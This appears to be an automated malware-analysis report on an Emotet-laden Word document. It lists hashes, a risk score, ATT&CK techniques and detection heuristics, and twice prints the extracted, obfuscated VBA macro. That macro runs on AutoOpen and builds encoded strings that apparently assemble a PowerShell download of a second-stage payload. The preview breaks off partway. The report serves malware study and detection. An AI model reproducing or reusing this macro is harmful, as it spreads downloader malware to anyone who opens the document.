Emotet Office (OLE) malware analysis — malicious · 3a80d1a1862427a8

MALICIOUS

Office (OLE)

213.0 KB Created: 2018-06-27 16:38:00 Authoring application: Microsoft Office Word First seen: 2018-07-23

MD5: cfb79e6d031033b5899f39aae5ffff03 SHA-1: 90d26707497e7b51684dab876c71685aeca07077 SHA-256: 3a80d1a1862427a86153b3df5f0911bf1bb8ed92e2e352fef7afcc7e5c755dfe

242 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1059 Command and Scripting Interpreter T1204.002 Malicious File

The sample is identified as malicious by ClamAV with a specific Emotet signature. Static analysis reveals the presence of a VBA macro with an AutoOpen function, which is a common execution vector for Emotet. The macro utilizes the Shell() function, indicating an attempt to execute external commands, likely for downloading and running a second-stage payload. The macro's obfuscated string concatenation suggests an effort to hide the malicious payload's origin or nature.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6877380-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6877380-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 10537 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	10537 bytes
SHA-256: `886da7781eb4a8eee12d80fbb0a3bcf49096fde0b42f8e1c74e47e62cdbebe9c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "hzrNfVlI" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "tECJutjzj" Function CsSjJwEzUqm() On Error Resume Next NzQCti = CDate(60569) NZaKsp = 85589 LtHupX = 87757 dMvpa = Sin(89840) Azscc = 22032 QijGa = bIilL izSGfTzmK = "Hell [S" + "trING]:" + ":J" + "Oi" + "n" + Chr(40) + "'', " + Chr(40) + " " + Chr(40) + " 1 " + ",83 , " + "106 ,95 " hOCXd = CDate(48832) MaRvhH = 36756 HNwQo = 28012 wYErdi = Sin(56369) viwkID = 68444 iRitj = pTrRiF wrmKGoEdhuk = ",2" + "4 ,75 ," + "64,82 ,8" + ",74,71" + ", " + "79, " + "64 " SMWQl = CDate(97538) tALQn = 78919 LdhWYR = 23933 RAkuf = Sin(68418) tiNUNF = 72382 liGSr = zwmWX rsjMVUjIC = ",70 " + ", 81," + " 5, 10" + "7 ,64" + ",81, " + "11, " + "114," bbzZAh = CDate(86911) LBwwUm = 36583 QQBGir = 64123 kKJIzY = Sin(2904) jwBbs = 22038 MJSfJ = lTqiC MbDFHWdEFHh = "64 ,71, " + "102,73" + ",76," + "64," + "75 , 81" + " ,30," + "1,82, 6" + "5 , 65 ," pjCmYP = CDate(56169) AslddH = 34248 lisDSO = 48816 luPLV = Sin(70985) jWFhi = 20847 SNVPO = wsqlB PKBjOFaubGD = " 24 ," + "2, " + "77,81 ," + "81 , 8" + "5 , 31 ," + " 10," + " 10, 8" + "2,82," + " 82 ," + " 11 ,86" LZIzKf = CDate(53284) smKWlC = 30196 jOjkA = 29455 XRwJjq = Sin(7860) bafYkj = 42222 LZHnZW = jsHwAM IqpVFH = ", 77," + "74 " + ", 85 ,8" + "1 , 77" + ",64, " + "85,74 ," + " 72" + ",6" + "4 ,66, 8" + "7 ," + "68" + " ,7" CCIjE = CDate(18308) XWTNK = 92854 QIInB = 23148 cubwL = Sin(3653) EDOlWz = 23856 iGjhU = CkfUuj bmOkbikK = "5,68, 81" + " ,64,11" + " , 70,7" + "4 , 7" + "2 ,10,1" + "24, 8" + "1 , 29 " + ",19 ,1" + "0 ,101 " MzCRpo = CDate(47423) nsCXuq = 6524 dfQvwJ = 24685 OmtiX = Sin(20468) swXdrB = 23296 WRDzDK = MUKjvI FZGTBzYR = ", 7" + "7," + " 81" + " ,81" + ", 85 ,3" + "1 ,10, 1" vUiAdj = CDate(63833) LfpkW = 75836 NfrnR = 45810 UprCC = Sin(72313) wuCaN = 64371 SLhui = wjQuJ KhRvP = "0,82 " + ", 82," + " 82,11 ," + " 86,77 " + ", 68 , 7" + "5 ," + "66,77 " + ", 68,76," + " 7" + "6 ,70" + " , 7" + "7," mYwZhI = CDate(84726) TZkAY = 93109 RmWjm = 54746 DNpBm = Sin(83110) oNrXJ = 1443 LFiGLM = cbLGPq YRlkazAU = " 76,71" + " ," + "68, 75" + " ,11," + "70,74 " + ", 72, 1" + "0 ," + " 106" CsSjJwEzUqm = izSGfTzmK + wrmKGoEdhuk + rsjMVUjIC + MbDFHWdEFHh + PKBjOFaubGD + IqpVFH + bmOkbikK + FZGTBzYR + KhRvP + YRlkazAU ihXKnl = CDate(12791) ovzbs = 64717 oWRqH = 54667 kOjio = Sin(72866) NVFdz = 58250 fIdbD = ftFmPY End Function Function PqvAQMGjjWU() On Error Resume Next LLuwXW = CDate(52414) SLsvJE = 20813 rnRjTt = 36858 JOTRw = Sin(91198) VEamuf = 77344 ordZk = KBjWfu dZcjSjPS = ",83, 93," + "119, 67" + " , 10" + " ,101," + " 77" + " ,81,81" + " , 85 , " + "31,10,10" + ",83" + ", " PZKahU = CDate(36508) zhRLru = 74820 FLAVi = 82551 JicSMp = Sin(11303) MdjaO = 29879 YNiiVf = iafzra KTojWA = "74,76," + "70," + " 64 , 9" + "2 , 74 " + ",80 ,8" + "7,74, " + "85" + ",76 ," + " 7" + "5 " + ",76" + ",74, 75" rQZYtv = CDate(48639) UbVZjN = ilztR XZNRGq = 32012 qlsBpo = Sin(15518) DotfO = 87822 iBJti = 38172 IBCtV = " ,86,11" + ",75 , 64" + " , 81" + " ,10" + " ," + "96 , 7" + "1, " + "68 , 1" + "07, 1" + "7,10" rEPXHE = CDate(6993) sDuQmc = RUpnAE cIPhVA = 62386 tcCtFJ = Sin(73285) XEiLF = 55304 nCWAFn = 84468 vrUpGIGBU = " , " + "101 " + ",77 , 81" + ",81 , 8" + "5 ,31, 1" + "0, " + "10 ,8" CziGDF = CDate(56116) SrHaf = mbXQZa lGzip = 28502 FmJCdI = Sin(9908) dGdYM = 38404 ZYvaO = 71082 AYwXHBm = "2 ," + "82,8" + "2 , 11 " + ",85 ,73" + " , 68, 7" + "5,74,65" + ",6" + "4,74" RivLZo = CDate(28965) kzNuL = iNLtj NOwSHB = 9375 qidZm = Sin(25464) AjLSA = 28127 GiiqWS = 48731 TaJJUcWjLHU = ",71 , 8" + "7 ,6" + "8 ,86 ,6" + "5, 64" + " ," + " 76 , 7" + "3," + " 77" + " ," + "68" + ",71,6" + "4 " PqvAQMGjjWU = dZcjSjPS + KTojWA + IBCtV + vrUpGIGBU + AYwXHBm + TaJJUcWjLHU DZp ... (truncated)

SHA-256: 886da7781eb4a8eee12d80fbb0a3bcf49096fde0b42f8e1c74e47e62cdbebe9c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "hzrNfVlI"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "tECJutjzj"
Function CsSjJwEzUqm()
On Error Resume Next
NzQCti = CDate(60569)
NZaKsp = 85589
LtHupX = 87757
dMvpa = Sin(89840)
Azscc = 22032
QijGa = bIilL
izSGfTzmK = "Hell [S" + "trING]:" + ":J" + "Oi" + "n" + Chr(40) + "'', " + Chr(40) + " " + Chr(40) + " 1 " + ",83 , " + "106 ,95 "
hOCXd = CDate(48832)
MaRvhH = 36756
HNwQo = 28012
wYErdi = Sin(56369)
viwkID = 68444
iRitj = pTrRiF
wrmKGoEdhuk = ",2" + "4 ,75 ," + "64,82 ,8" + ",74,71" + ", " + "79, " + "64 "
SMWQl = CDate(97538)
tALQn = 78919
LdhWYR = 23933
RAkuf = Sin(68418)
tiNUNF = 72382
liGSr = zwmWX
rsjMVUjIC = ",70 " + ", 81," + " 5, 10" + "7 ,64" + ",81, " + "11, " + "114,"
bbzZAh = CDate(86911)
LBwwUm = 36583
QQBGir = 64123
kKJIzY = Sin(2904)
jwBbs = 22038
MJSfJ = lTqiC
MbDFHWdEFHh = "64 ,71, " + "102,73" + ",76," + "64," + "75 , 81" + " ,30," + "1,82, 6" + "5 , 65 ,"
pjCmYP = CDate(56169)
AslddH = 34248
lisDSO = 48816
luPLV = Sin(70985)
jWFhi = 20847
SNVPO = wsqlB
PKBjOFaubGD = " 24 ," + "2, " + "77,81 ," + "81 , 8" + "5 , 31 ," + " 10," + " 10, 8" + "2,82," + " 82 ," + " 11 ,86"
LZIzKf = CDate(53284)
smKWlC = 30196
jOjkA = 29455
XRwJjq = Sin(7860)
bafYkj = 42222
LZHnZW = jsHwAM
IqpVFH = ", 77," + "74 " + ", 85 ,8" + "1 , 77" + ",64, " + "85,74 ," + " 72" + ",6" + "4 ,66, 8" + "7 ," + "68" + " ,7"
CCIjE = CDate(18308)
XWTNK = 92854
QIInB = 23148
cubwL = Sin(3653)
EDOlWz = 23856
iGjhU = CkfUuj
bmOkbikK = "5,68, 81" + " ,64,11" + " , 70,7" + "4 , 7" + "2 ,10,1" + "24, 8" + "1 , 29 " + ",19 ,1" + "0 ,101 "
MzCRpo = CDate(47423)
nsCXuq = 6524
dfQvwJ = 24685
OmtiX = Sin(20468)
swXdrB = 23296
WRDzDK = MUKjvI
FZGTBzYR = ", 7" + "7," + " 81" + " ,81" + ", 85 ,3" + "1 ,10, 1"
vUiAdj = CDate(63833)
LfpkW = 75836
NfrnR = 45810
UprCC = Sin(72313)
wuCaN = 64371
SLhui = wjQuJ
KhRvP = "0,82 " + ", 82," + " 82,11 ," + " 86,77 " + ", 68 , 7" + "5 ," + "66,77 " + ", 68,76," + " 7" + "6 ,70" + " , 7" + "7,"
mYwZhI = CDate(84726)
TZkAY = 93109
RmWjm = 54746
DNpBm = Sin(83110)
oNrXJ = 1443
LFiGLM = cbLGPq
YRlkazAU = " 76,71" + " ," + "68, 75" + " ,11," + "70,74 " + ", 72, 1" + "0 ," + " 106"
CsSjJwEzUqm = izSGfTzmK + wrmKGoEdhuk + rsjMVUjIC + MbDFHWdEFHh + PKBjOFaubGD + IqpVFH + bmOkbikK + FZGTBzYR + KhRvP + YRlkazAU
ihXKnl = CDate(12791)
ovzbs = 64717
oWRqH = 54667
kOjio = Sin(72866)
NVFdz = 58250
fIdbD = ftFmPY
End Function
Function PqvAQMGjjWU()
On Error Resume Next
LLuwXW = CDate(52414)
SLsvJE = 20813
rnRjTt = 36858
JOTRw = Sin(91198)
VEamuf = 77344
ordZk = KBjWfu
dZcjSjPS = ",83, 93," + "119, 67" + " , 10" + " ,101," + " 77" + " ,81,81" + " , 85 , " + "31,10,10" + ",83" + ", "
PZKahU = CDate(36508)
zhRLru = 74820
FLAVi = 82551
JicSMp = Sin(11303)
MdjaO = 29879
YNiiVf = iafzra
KTojWA = "74,76," + "70," + " 64 , 9" + "2 , 74 " + ",80 ,8" + "7,74, " + "85" + ",76 ," + " 7" + "5 " + ",76" + ",74, 75"
rQZYtv = CDate(48639)
UbVZjN = ilztR
XZNRGq = 32012
qlsBpo = Sin(15518)
DotfO = 87822
iBJti = 38172
IBCtV = " ,86,11" + ",75 , 64" + " , 81" + " ,10" + " ," + "96 , 7" + "1, " + "68 , 1" + "07, 1" + "7,10"
rEPXHE = CDate(6993)
sDuQmc = RUpnAE
cIPhVA = 62386
tcCtFJ = Sin(73285)
XEiLF = 55304
nCWAFn = 84468
vrUpGIGBU = " , " + "101 " + ",77 , 81" + ",81 , 8" + "5 ,31, 1" + "0, " + "10 ,8"
CziGDF = CDate(56116)
SrHaf = mbXQZa
lGzip = 28502
FmJCdI = Sin(9908)
dGdYM = 38404
ZYvaO = 71082
AYwXHBm = "2 ," + "82,8" + "2 , 11 " + ",85 ,73" + " , 68, 7" + "5,74,65" + ",6" + "4,74"
RivLZo = CDate(28965)
kzNuL = iNLtj
NOwSHB = 9375
qidZm = Sin(25464)
AjLSA = 28127
GiiqWS = 48731
TaJJUcWjLHU = ",71 , 8" + "7 ,6" + "8 ,86 ,6" + "5, 64" + " ," + " 76 , 7" + "3," + " 77" + " ," + "68" + ",71,6" + "4 "
PqvAQMGjjWU = dZcjSjPS + KTojWA + IBCtV + vrUpGIGBU + AYwXHBm + TaJJUcWjLHU
DZp
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.